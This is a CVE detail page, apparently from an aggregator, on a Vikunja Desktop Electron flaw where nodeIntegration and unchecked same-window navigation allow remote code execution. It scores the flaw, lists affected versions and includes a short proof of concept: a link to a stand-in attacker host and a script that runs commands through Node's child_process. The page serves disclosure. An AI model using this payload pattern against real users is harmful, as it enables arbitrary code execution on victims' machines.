CVE-2026-33336 Vulnerability Analysis & Exploit Details

CVE-2026-33336
Vulnerability Scoring

8.8
/10
Severe Risk

Cybersecurity professionals consider CVE-2026-33336 an immediate threat requiring urgent mitigation.

Attack Complexity Details

  • Attack Complexity: Low
    Exploits can be performed without significant complexity or special conditions.
  • Attack Vector: Network
    Vulnerability is exploitable over a network without physical access.
  • Privileges Required: None
    No privileges are required for exploitation.
  • Scope: Unchanged
    Exploit remains within the originally vulnerable component.
  • User Interaction: Required
    User interaction is necessary for successful exploitation.

CVE-2026-33336 Details

Status: Analyzed

Last updated: 🕟 27 Mar 2026, 16:54 UTC
Originally published on: 🕓 24 Mar 2026, 16:16 UTC

Time between publication and last update: 3 days

CVSS Release: version 3

CVSS3 Source

nvd@nist.gov

CVSS3 Type

Primary

CVSS3 Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

CVE-2026-33336 Vulnerability Summary

CVE-2026-33336: Vikunja is an open-source self-hosted task management platform. Starting in version 0.21.0 and prior to version 2.2.0, the Vikunja Desktop Electron wrapper enables `nodeIntegration` in the main BrowserWindow and does not restrict same-window navigations. An attacker who can place a link in user-generated content (task descriptions, comments, project descriptions) can cause the BrowserWindow to navigate to an attacker-controlled origin, where JavaScript executes with full Node.js access, resulting in arbitrary code execution on the victim's machine. Version 2.2.0 patches the issue. ## Root cause Two misconfigurations combine to create this vulnerability: 1. **`nodeIntegration: true`** is set in `BrowserWindow` web preferences (`desktop/main.js:14-16`), giving any page loaded in the renderer full access to Node.js APIs (`require`, `child_process`, `fs`, etc.). 2. **No `will-navigate` or `will-redirect` handler** is registered on the `webContents`. The existing `setWindowOpenHandler` (`desktop/main.js:19-23`) only intercepts `window.open()` calls (new-window requests). It does **not** intercept same-window navigations triggered by: - `<a href="https://...">` links (without `target="_blank"`) - `window.location` assignments - HTTP redirects - `<meta http-equiv="refresh">` tags ## Attack scenario 1. The attacker is a normal user on the same Vikunja instance (e.g., a member of a shared project). 2. The attacker creates or edits a project description or task description containing a standard HTML link, e.g.: `<a href="https://evil.example/exploit">Click here for the updated design spec</a>` 3. The Vikunja frontend renders this link. DOMPurify sanitization correctly allows it -- it is a legitimate anchor tag, not a script injection. Render path example: `frontend/src/views/project/ProjectInfo.vue` uses `v-html` with DOMPurify-sanitized output. 4. The victim uses Vikunja Desktop and clicks the link. 5. Because no `will-navigate` handler exists, the BrowserWindow navigates to `https://evil.example/exploit` in the same renderer process. 6. The attacker's page now executes in a context with `nodeIntegration: true` and runs: `require('child_process').exec('id > /tmp/pwned');` 7. Arbitrary commands execute as the victim's OS user. ## Impact Full remote code execution on the victim's desktop. The attacker can read/write arbitrary files, execute arbitrary commands, install malware or backdoors, and exfiltrate credentials and sensitive data. No XSS vulnerability is required -- a normal, sanitizer-approved hyperlink is sufficient. ## Proof of concept 1. Set up a Vikunja instance with two users sharing a project. 2. As the attacker user, edit a project description to include: `<a href="https://attacker.example/poc.html">Meeting notes</a>` 3. Host poc.html with: `<script>require('child_process').exec('calc.exe')</script>` 4. As the victim, open the project in Vikunja Desktop and click the link. 5. calc.exe (or any other command) executes on the victim's machine. ## Credits This vulnerability was found using [GitHub Security Lab Taskflows](https://github.com/GitHubSecurityLab/seclab-taskflows).

Assessing the Risk of CVE-2026-33336

Access Complexity Graph

The exploitability of CVE-2026-33336 depends on two key factors: attack complexity (the level of effort required to execute an exploit) and privileges required (the access level an attacker needs).

Exploitability Analysis for CVE-2026-33336

With low attack complexity and no required privileges, CVE-2026-33336 is an easy target for cybercriminals. Organizations should prioritize immediate mitigation measures to prevent unauthorized access and data breaches.

Understanding AC and PR

A lower complexity and fewer privilege requirements make exploitation easier. Security teams should evaluate these aspects to determine the urgency of mitigation strategies, such as patch management and access control policies.

Attack Complexity (AC) measures the difficulty in executing an exploit. A high AC means that specific conditions must be met, making an attack more challenging, while a low AC means the vulnerability can be exploited with minimal effort.

Privileges Required (PR) determine the level of system access necessary for an attack. Vulnerabilities requiring no privileges are more accessible to attackers, whereas high privilege requirements limit exploitation to authorized users with elevated access.

CVSS Score Breakdown Chart

Above is the CVSS Sub-score Breakdown for CVE-2026-33336, illustrating how Base, Impact, and Exploitability factors combine to form the overall severity rating. A higher sub-score typically indicates a more severe or easier-to-exploit vulnerability.

CIA Impact Analysis

Below is the Impact Analysis for CVE-2026-33336, showing how Confidentiality, Integrity, and Availability might be affected if the vulnerability is exploited. Higher values usually signal greater potential damage.

  • Confidentiality: High
    Exploiting CVE-2026-33336 can result in unauthorized access to sensitive data, severely compromising data privacy.
  • Integrity: High
    CVE-2026-33336 could allow unauthorized modifications to data, potentially affecting system reliability and trust.
  • Availability: High
    CVE-2026-33336 can disrupt system operations, potentially causing complete denial of service (DoS).

CVE-2026-33336 References

External References

CWE Common Weakness Enumeration

CWE-94

CAPEC Common Attack Pattern Enumeration and Classification

  • Code Injection CAPEC-242 An adversary exploits a weakness in input validation on the target to inject new code into that which is currently executing. This differs from code inclusion in that code inclusion involves the addition or replacement of a reference to a code file, which is subsequently loaded by the target and used as part of the code of some application.
  • Leverage Executable Code in Non-Executable Files CAPEC-35 An attack of this type exploits a system's trust in configuration and resource files. When the executable loads the resource (such as an image file or configuration file) the attacker has modified the file to either execute malicious code directly or manipulate the target process (e.g. application server) to execute based on the malicious configuration parameters. Since systems are increasingly interrelated mashing up resources from local and remote sources the possibility of this attack occurring is high.
  • Manipulating User-Controlled Variables CAPEC-77 This attack targets user controlled variables (DEBUG=1, PHP Globals, and So Forth). An adversary can override variables leveraging user-supplied, untrusted query variables directly used on the application server without any data sanitization. In extreme cases, the adversary can change variables controlling the business logic of the application. For instance, in languages like PHP, a number of poorly set default configurations may allow the user to override variables.

Vulnerable Configurations

  • cpe:2.3:a:vikunja:vikunja:0.21.0:*:*:*:*:*:*:*
    cpe:2.3:a:vikunja:vikunja:0.21.0:*:*:*:*:*:*:*
  • cpe:2.3:a:vikunja:vikunja:0.22.0:*:*:*:*:*:*:*
    cpe:2.3:a:vikunja:vikunja:0.22.0:*:*:*:*:*:*:*
  • cpe:2.3:a:vikunja:vikunja:0.22.1:*:*:*:*:*:*:*
    cpe:2.3:a:vikunja:vikunja:0.22.1:*:*:*:*:*:*:*
  • cpe:2.3:a:vikunja:vikunja:0.23.0:*:*:*:*:*:*:*
    cpe:2.3:a:vikunja:vikunja:0.23.0:*:*:*:*:*:*:*
  • cpe:2.3:a:vikunja:vikunja:0.24.0:*:*:*:*:*:*:*
    cpe:2.3:a:vikunja:vikunja:0.24.0:*:*:*:*:*:*:*
  • cpe:2.3:a:vikunja:vikunja:0.24.1:*:*:*:*:*:*:*
    cpe:2.3:a:vikunja:vikunja:0.24.1:*:*:*:*:*:*:*
  • cpe:2.3:a:vikunja:vikunja:0.24.2:*:*:*:*:*:*:*
    cpe:2.3:a:vikunja:vikunja:0.24.2:*:*:*:*:*:*:*
  • cpe:2.3:a:vikunja:vikunja:0.24.3:*:*:*:*:*:*:*
    cpe:2.3:a:vikunja:vikunja:0.24.3:*:*:*:*:*:*:*
  • cpe:2.3:a:vikunja:vikunja:0.24.4:*:*:*:*:*:*:*
    cpe:2.3:a:vikunja:vikunja:0.24.4:*:*:*:*:*:*:*
  • cpe:2.3:a:vikunja:vikunja:0.24.5:*:*:*:*:*:*:*
    cpe:2.3:a:vikunja:vikunja:0.24.5:*:*:*:*:*:*:*
  • cpe:2.3:a:vikunja:vikunja:0.24.6:*:*:*:*:*:*:*
    cpe:2.3:a:vikunja:vikunja:0.24.6:*:*:*:*:*:*:*
  • cpe:2.3:a:vikunja:vikunja:1.0.0:-:*:*:*:*:*:*
    cpe:2.3:a:vikunja:vikunja:1.0.0:-:*:*:*:*:*:*
  • cpe:2.3:a:vikunja:vikunja:1.0.0:rc0:*:*:*:*:*:*
    cpe:2.3:a:vikunja:vikunja:1.0.0:rc0:*:*:*:*:*:*
  • cpe:2.3:a:vikunja:vikunja:1.0.0:rc1:*:*:*:*:*:*
    cpe:2.3:a:vikunja:vikunja:1.0.0:rc1:*:*:*:*:*:*
  • cpe:2.3:a:vikunja:vikunja:1.0.0:rc2:*:*:*:*:*:*
    cpe:2.3:a:vikunja:vikunja:1.0.0:rc2:*:*:*:*:*:*
  • cpe:2.3:a:vikunja:vikunja:1.0.0:rc3:*:*:*:*:*:*
    cpe:2.3:a:vikunja:vikunja:1.0.0:rc3:*:*:*:*:*:*
  • cpe:2.3:a:vikunja:vikunja:1.0.0:rc4:*:*:*:*:*:*
    cpe:2.3:a:vikunja:vikunja:1.0.0:rc4:*:*:*:*:*:*
  • cpe:2.3:a:vikunja:vikunja:1.1.0:*:*:*:*:*:*:*
    cpe:2.3:a:vikunja:vikunja:1.1.0:*:*:*:*:*:*:*
  • cpe:2.3:a:vikunja:vikunja:2.0.0:*:*:*:*:*:*:*
    cpe:2.3:a:vikunja:vikunja:2.0.0:*:*:*:*:*:*:*
  • cpe:2.3:a:vikunja:vikunja:2.1.0:*:*:*:*:*:*:*
    cpe:2.3:a:vikunja:vikunja:2.1.0:*:*:*:*:*:*:*

Protect Your Infrastructure against CVE-2026-33336: Combat Critical CVE Threats

Stay updated with real-time CVE vulnerabilities and take action to secure your systems. Enhance your cybersecurity posture with the latest threat intelligence and mitigation techniques. Develop the skills necessary to defend against CVEs and secure critical infrastructures. Join the top cybersecurity professionals safeguarding today's infrastructures.

Other 5 Recently Published CVEs Vulnerabilities

  • CVE-2026-6451 – The cms-fuer-motorrad-werkstaetten plugin for WordPress is vulnerable to Cross-Site Request Forgery in versions up to and including 1.0.0. This is ...
  • CVE-2026-40002 – Red Magic 11 Pro (NX809J) contains a vulnerability that allows non-privileged applications to trigger sensitive operations. The vulnerability stems...
  • CVE-2026-33392 – In JetBrains YouTrack before 2025.3.131383 high privileged user can achieve RCE via sandbox bypass
  • CVE-2026-23853 – Dell PowerProtect Data Domain with Data Domain Operating System (DD OS) of Feature Release versions 7.7.1.0 through 8.5, LTS2025 release version 8....
  • CVE-2026-6443 – The Accordion and Accordion Slider plugin for WordPress is vulnerable to an injected backdoor in version 1.4.6. This is due to the plugin being sol...